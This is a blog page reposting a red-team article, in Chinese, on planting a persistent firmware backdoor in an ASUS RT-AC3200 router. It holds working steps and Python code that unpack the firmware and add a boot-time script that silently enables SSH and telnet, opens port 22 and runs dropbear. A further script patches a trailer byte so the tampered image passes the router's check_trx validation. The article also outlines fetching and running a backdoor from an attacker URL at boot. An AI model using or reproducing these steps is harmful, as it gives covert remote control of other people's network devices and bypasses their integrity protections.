<!DOCTYPE HTML>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> 
    <title>华硕路由器添加固件后门 - Golang编程语言知识介绍</title>
    <meta name="keywords" content="git,Git,Lua,lua,Golang,go">
    
    <meta property="og:title" content="华硕路由器添加固件后门">
    <meta property="og:site_name" content="Golang编程语言知识介绍">
    <meta property="og:image" content="/img/author.jpg"> 
    <meta name="title" content="华硕路由器添加固件后门 - Golang编程语言知识介绍" />
    <meta name="description" content="愿星光伴你左右"> 
    <link rel="shortcut icon" href="http://shanks.link/img/favicon.ico" />
    <link rel="apple-touch-icon" href="http://shanks.link/img/apple-touch-icon.png" />
    <link rel="apple-touch-icon-precomposed" href="http://shanks.link/img/apple-touch-icon.png" />
    <link href="http://shanks.link/js/vendor/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />
    <link href="http://shanks.link/js/vendor/fancybox/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />
    <link href="http://shanks.link/css/main.css" rel="stylesheet" type="text/css" />
    <link href="http://shanks.link/css/syntax.css" rel="stylesheet" type="text/css" />
    <script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
     fancybox: true, 
    motion: true
  };
</script>
</head>
<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
<div class="container one-collumn sidebar-position-left page-home  ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"> <div class="site-meta  custom-logo ">

  <div class="custom-logo-site-title">
    <a href="http://shanks.link/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Golang编程语言知识介绍</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
    <ul id="menu" class="menu">
      
      
        <li class="menu-item ">
          <a href="http://shanks.link/post/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/thinking/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />随想录
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/%E7%94%9F%E6%B4%BB/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />生活
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/thinking/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />思考
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/os/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />OS
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/lua/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />lua
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/redis/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />redis
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/go/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Golang
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/c/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />C
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/tcpip/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />TCP/IP
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/ebpf/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />ebpf
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/p4/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />p4
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/openvpn/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />OpenVPN
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/ipsec/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />IPSec
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/l2tp/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />L2TP
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/dns/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />DNS
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/web/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />web
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/openwrt/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />OpenWRT
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/%E8%BF%90%E7%BB%B4/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />运维
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/git/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />Git
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/%E9%B8%9F%E5%93%A5%E7%9A%84%E7%A7%81%E6%88%BF%E8%8F%9C/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />鸟哥的私房菜
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/categories/it/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />IT杂谈
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/about/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />About Me
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/links/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />友情链接
          </a>
        </li>
      
        <li class="menu-item ">
          <a href="http://shanks.link/ftp/" rel="section">
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br />FTP
          </a>
        </li>
      
      <li class="menu-item menu-item-search">
        <a href="javascript:;" class="popup-trigger"> <i class="menu-item-icon fa fa-search fa-fw"></i> <br /> 搜索</a>
      </li>
    </ul>
    <div class="site-search">
      <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>

    </div>
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            
<section id="posts" class="posts-expand">
  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <header class="post-header">
      <h1 class="post-title" itemprop="name headline">
        <a class="post-title-link" href="http://shanks.link/blog/2023/06/14/%E5%8D%8E%E7%A1%95%E8%B7%AF%E7%94%B1%E5%99%A8%E6%B7%BB%E5%8A%A0%E5%9B%BA%E4%BB%B6%E5%90%8E%E9%97%A8/" itemprop="url">
        华硕路由器添加固件后门
        </a>
      </h1>
      <div class="post-meta">
      <span class="post-time">
<span class="post-meta-item-icon">
    <i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">时间：</span>
<time itemprop="dateCreated" datetime="2016-03-22T13:04:35+08:00" content="2023-06-14">
    2023-06-14
</time>
</span> 
      

  <span class="post-category" >
  &nbsp; | &nbsp;
  <span class="post-meta-item-icon">
    <i class="fa fa-folder-o"></i>
  </span>
  <span class="post-meta-item-text">分类：</span>
  
    <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
      <a href="http://shanks.link/categories/openwrt" itemprop="url" rel="index">
        <span itemprop="name">OpenWrt</span>
      </a>
      &nbsp; 
    </span>
  
</span>


       <span>
&nbsp; | &nbsp;
<span class="post-meta-item-icon">
    <i class="fa fa-eye"></i>
</span>
<span class="post-meta-item-text">阅读：</span>
<span class="leancloud-visitors-count">2217 字 ~5分钟</span>
</span>
      </div>
    </header>
    <div class="post-body" itemprop="articleBody">
    <p><a href="http://cn-sec.com/archives/92207.html">以下内容转载自</a></p>
<p><strong>概述</strong></p>
<p>在进行IoT漏洞利用的过程中，后利用阶段为了扩展利用效果和加强红队攻防对抗的能力，固件级别的后门（BackDoor）是非常重要的。</p>
<p>极光无限维阵专家团队基于对华硕路由器漏洞的研究，对华硕无线路由器固件进行了深入解析，<strong>我们得出以下结论：直接在固件中添加后门命令，路由器前台进行固件更新即可植入固件级别的后门。</strong></p>
<p>本文对使用的工具和固件后门植入的过程进行了梳理，并分享了操作中遇到的问题及解决方案。</p>
<p><strong>作者：维阵漏洞研究员&ndash;lawren</strong></p>
<p><strong>工具</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">firmware-mod-kit: https://gitlab.com/kalilinux/packages/firmware-mod-kitida: https://www.hex-rays.com/products/ida/python: https://www.python.org/
</code></pre></div><p><strong>安装firmware-mod-kit</strong></p>
<p>firmware-mod-kit工具包可用于提取固件中的文件系统，然后进行修改，并重新打包成固件。我们可以使用它对固件做定制化的修改。</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">$ sudo apt-get install git build-essential zlib1g-dev liblzma-dev python-magic$ git clone https://gitlab.com/kalilinux/packages/firmware-mod-kit.git$ cd firmware-mod-kit
</code></pre></div><p><strong>使用firmware-mod-kit</strong></p>
<p>以华硕RT-AC3200_3.0.0.4_382_51940-ga3b9d4a.trx这款固件为例，步骤如下：</p>
<p><strong>1、解包固件，采用extract-firmware.sh来提取固件中的文件系统：</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">$ ./extract-firmware.sh RT-AC3200_3.0.0.4_382_51940-ga3b9d4a.trx
</code></pre></div><p>解包后的文件系统会存放在当前目录的fmk文件夹中，其中包括rootfs，image_part和logs等文件夹。由于攻击者的目的大多是添加后门和修改固件，因此这里我们只关心rootfs文件夹。</p>
<p>rootfs文件夹中包含了固件中的整套文件系统。而我们所要做的工作就是在固件中添加后门，然后找到固件启动后自动调用后门的方法。</p>
<p><strong>2、重新打包固件：</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">$ ./build-firmware.sh fmk/
</code></pre></div><p>重新打包好的固件会存放在fmk/目录中，文件名为new-firmware.bin。</p>
<p><strong>为华硕路由器固件添加后门</strong></p>
<p><strong>1、首先查看固件所基于的架构。对固件中任意文件执行 readelf命令就可以查看其架构，以BusyBox文件为例：</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">$ readelf -h fmk/rootfs/bin/busybox

    ELF Header:    Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00     Class:                             ELF32    Data:                              2&#39;s complement, little endian    Version:                           1 (current)    OS/ABI:                            UNIX - System V    ABI Version:                       0    Type:                              EXEC (Executable file)    Machine:                           ARM    Version:                           0x1    Entry point address:               0xc4c4    Start of program headers:          52 (bytes into file)    Start of section headers:          571724 (bytes into file)    Flags:                             0x5000002, Version5 EABI, &lt;unknown&gt;    Size of this header:               52 (bytes)    Size of program headers:           32 (bytes)    Number of program headers:         6    Size of section headers:           40 (bytes)    Number of section headers:         25    Section header string table index: 24
</code></pre></div><p>正如我们看到的，固件是基于ARM小端架构的。这意味着我们之后需要开发符合ARM小端架构的后门并进行编译。</p>
<p><strong>2、下一步是在文件系统中寻找如何在启动过程中执行命令的方式，我们提供了三种思路。</strong></p>
<p>**思路一：**寻找在启动过程中自动调用的脚本，在其中添加我们要执行的命令。</p>
<p>在文件系统中找到一个每次重启路由器时都会执行的shell脚本，我们以一个符合条件的脚本/usr/sbin/gencert.sh为例，在该脚本中添加指令，让路由器重启时，从我们指定的url下载arm后门到tmp目录并执行。</p>
<p>**思路二：**在脚本/usr/sbin/gencert.sh中打开华硕路由器的ssh，这样在路由器重启后就可以直接通过ssh连接路由器。</p>
<p>**思路三：**在文件系统中放入我们编译好的后门程序，在/usr/sbin/gencert.sh中执行后门程序，这样在路由器重启时就会启动后门。</p>
<p><strong>我们采用第二个思路，用到的代码如下：</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">import os    os.system(&#34;touch fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;sleep 120&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;nvram set sshd_enable=1&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;nvram set sshd_port_x=22&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;nvram set sshd_port=22&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;nvram set telnetd_enable=1&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;nvram set sshd_pass=1&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;service start_telnetd&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;service start_sshd&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;sleep 10&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;iptables -I INPUT -p tcp --dport 22 -j ACCEPT&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;sleep 30&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;dropbear -a -p 22&#39; &gt;&gt; fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;chmod 4777 fmk/rootfs/usr/sbin/xtables&#34;)    os.system(&#34;echo &#39;/usr/sbin/xtables &amp;&#39; &gt;&gt; fmk/rootfs/usr/sbin/gencert.sh&#34;)
</code></pre></div><p>上面的代码会新建一个文件fmk/rootfs/usr/sbin/xtables，这就是我们的后门程序，其作用是开启ssh。具体内容如下：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">    sleep 120    nvram set sshd_enable=1    nvram set sshd_port_x=22    nvram set sshd_port=22    nvram set telnetd_enable=1    nvram set sshd_pass=1    service start_telnetd    service start_sshd    sleep 10    iptables -I INPUT -p tcp --dport 22 -j ACCEPT    sleep 30    dropbear -a -p 22
</code></pre></div><p>最后在fmk/rootfs/usr/sbin/gencert.sh中，</p>
<p>添加执行fmk/rootfs/usr/sbin/xtables的命令，路由器启动时就会执行gencert.sh，继而执行xtables，最终开启ssh。</p>
<p><strong>3、此时就完成了后门的添加，执行build-firmware.sh重打包固件就完成了。</strong></p>
<p><strong>4、更新固件后通过ssh连接路由器。</strong></p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">ssh admin@xxx.xxx.xxx.xxx
</code></pre></div><p><strong>更新固件</strong></p>
<p>方式一：Web页面点击上传更新固件</p>
<p>方式二：编写脚本自动完成上传并更新固件</p>
<p><strong>测试分析</strong></p>
<p>固件篡改的功能强大，对于攻击者而言是梦寐以求的目标。这是因为，如果能够实现对固件的篡改，那么攻击者就能够实现绕过保护机制、移除安全防护措施、添加后门等操作。</p>
<p><strong>遇到的问题</strong></p>
<p><strong>问题一：由于重打包后的固件大小和原固件大小不一致，导致打包失败</strong></p>
<p>**
**</p>
<p><img src="http://cn-sec.com/wp-content/uploads/2020/08/4-1597678352.png" alt="华硕路由器添加固件后门"></p>
<p>我们采取的解决方法是将文件系统里的图片文件缩小，从而缩小重打包后的固件大小，压缩图片大小的代码如下：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">    import os    def search(root, target):        items = os.listdir(root)        for item in items:            path = os.path.join(root, item)            if os.path.isdir(path):                #print(&#39;[-]&#39;, path)                search(path, target)            if target in path.split(&#39;/&#39;)[-1]:                os.system(&#34;convert &#34; + path + &#34; &#34; + path + &#34;.gif&#34;)                os.system(&#34;convert -strip -quality 75% &#34; + path + &#34;.gif &#34; + path + &#34;.gif&#34;)                os.system(&#34;rm &#34; + path)                os.system(&#34;mv &#34; + path + &#34;.gif &#34; + path)

    search(&#34;fmk/rootfs/www/images/&#34;, &#34;.png&#34;)
</code></pre></div><p><strong>问题二：重打包后的固件不能通过华硕路由器的校验</strong></p>
<p><img src="http://cn-sec.com/wp-content/uploads/2020/08/10-1597678354.png" alt="华硕路由器添加固件后门"></p>
<p>我们通过逆向华硕校验代码，编写脚本对打包后的固件进行校验值计算并写入固件中，从而顺利通过华硕路由器的校验。</p>
<p>通过逆向，可以确定是libshared.so动态链接库中的check_imagefile函数对固件进行校验的，如下图：</p>
<p><img src="http://cn-sec.com/wp-content/uploads/2020/08/4-1597678355.png" alt="华硕路由器添加固件后门"></p>
<p>上图中check_crc函数可以通过校验，firmware-mod-kit已经帮我们计算好了crc，但firmware-mod-kit并没有完成check_trx函数校验。</p>
<p>通过分析，check_trx函数会校验固件尾部的一个字节值，我们编写脚本并修改firmware-mod-kit重打包生成的固件中对应字节，从而通过check_trx函数校验。相关代码如下：</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">import os    with open(&#39;fmk/new-firmware.bin&#39;, &#39;rb&#39;) as f:        image_data = f.read()    with open(&#39;fmk/new-firmware1.bin&#39;, &#39;wb+&#39;) as f:        write_data = image_data[0:-28] + &#39;x4c&#39; + image_data[-27:]        f.write(write_data)    os.system(&#34;src/crcalc/crcalc fmk/new-firmware1.bin fmk/logs/binwalk.log&#34;)
</code></pre></div>
    </div>
    <footer class="post-footer">
     
 
<div class="post-tags">     
     
    <a href="http://shanks.link/tags/openwrt" rel="tag" title="OpenWrt">#OpenWrt#</a>
    
</div>



     <div class="post-nav">
    <div class="post-nav-next post-nav-item">
    
        <a href="http://shanks.link/blog/2023/07/10/%E5%B7%9D%E8%A5%BF%E8%B7%9F%E5%9B%A2%E4%B8%89%E6%97%A5%E6%B8%B8/" rel="next" title="川西跟团三日游">
        <i class="fa fa-chevron-left"></i> 川西跟团三日游
        </a>
    
    </div>

    <div class="post-nav-prev post-nav-item">
    
        <a href="http://shanks.link/blog/2023/05/31/%E5%AF%86%E9%92%A5%E4%BA%A4%E6%8D%A2%E5%8D%8F%E8%AE%AE%E4%B9%8Bikev2/" rel="prev" title="密钥交换协议之IKEv2">
        密钥交换协议之IKEv2 <i class="fa fa-chevron-right"></i>
        </a>
    
    </div>
</div>
      
     
     
     





<script src="https://utteranc.es/client.js"
        repo="shankusu2017@gmail.com/"
        issue-term="pathname"
        theme="github-light"
        crossorigin="anonymous"
        async>
</script>
<noscript>Please enable JavaScript to view the <a href="https://github.com/utterance">comments powered by utterances.</a></noscript>

    </footer>
  </article>
</section>

          </div>
        </div>
        <div class="sidebar-toggle">
  <div class="sidebar-toggle-line-wrap">
    <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
    <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
    <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
  </div>
</div>
<aside id="sidebar" class="sidebar">
  <div class="sidebar-inner">

    <section class="site-overview sidebar-panel  sidebar-panel-active ">
      <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image"
        src="http://shanks.link/img/logo.jpg"
        alt="shankusu2017@gmail.com" />
    <p class="site-author-name" itemprop="name">shankusu2017@gmail.com</p>
    <p class="site-description motion-element" itemprop="description"> </p>
</div>
      <nav class="site-state motion-element">
    <div class="site-state-item site-state-posts">
        <a href="http://shanks.link/post/">
            <span class="site-state-item-name">日志</span>
        </a>
    </div>
    <div class="site-state-item site-state-categories">
        <a href="http://shanks.link/categories/">
            <span class="site-state-item-name">分类</span>
        </a>
    </div>

    <div class="site-state-item site-state-tags">
        <a href="http://shanks.link/tags/">
            <span class="site-state-item-name">标签</span>
        </a>
    </div>
</nav>

      
      
<div class="links-of-author motion-element">
    
        <span class="links-of-author-item">
        <a href="https://github.com/shankusu2017" target="_blank" title="GitHub">
            <i class="fa fa-fw fa-github"></i>
            GitHub
        </a>
        </span>
    
</div>


      

      <div class="links-of-blogroll motion-element inline">
<script type="text/javascript" src="//rf.revolvermaps.com/0/0/8.js?i=5b4f2ucxar6&amp;m=0&amp;s=220&amp;c=ff0000&amp;cr1=ffffff&amp;f=arial&amp;l=33&amp;bv=35" async="async"></script>
</div>

    </section>
    
  </div>
</aside>

      </div>
    </main>
   
    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  <span itemprop="copyrightYear">  &copy; 
  2009 - 2024</span>
</div>
<div>
  <a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">粤ICP备2021068940号-1</a>
  <a href="https://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011302003059" rel="noopener" target="_blank">粤公网安备44011302003059</a>
</div>


      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
      <span id="scrollpercent"><span>0</span>%</span>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
<script type="text/javascript" src="http://shanks.link/js/vendor/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="http://shanks.link/js/vendor/fastclick/lib/fastclick.min.js?v=1.0.6"></script> 
<script type="text/javascript" src="http://shanks.link/js/vendor/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="http://shanks.link/js/vendor/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="http://shanks.link/js/vendor/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="http://shanks.link/js/vendor/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>

<script src="http://shanks.link/js/vendor/fancybox/jquery.fancybox.pack.js?v=2.1.5"></script>

<script type="text/javascript" src="http://shanks.link/js/utils.js"></script>
<script type="text/javascript" src="http://shanks.link/js/motion.js"></script>
<script type="text/javascript" src="http://shanks.link/js/affix.js"></script>
<script type="text/javascript" src="http://shanks.link/js/schemes/pisces.js"></script>

<script type="text/javascript" src="http://shanks.link/js/scrollspy.js"></script>
<script type="text/javascript" src="http://shanks.link/js/post-details.js"></script>
<script type="text/javascript" src="http://shanks.link/js/toc.js"></script>

<script type="text/javascript" src="http://shanks.link/js/bootstrap.js"></script>

<script type="text/javascript" src="http://shanks.link/js/search.js"></script>
<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    extensions: ["tex2jax.js"],
    jax: ["input/TeX", "output/HTML-CSS"],
    tex2jax: {
      inlineMath: [ ['$','$'] ],
      displayMath: [ ['$$','$$'] ],
      processEscapes: true
    },
    "HTML-CSS": { fonts: ["TeX"] }
  });
</script>
<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML' async></script>
</body>
</html>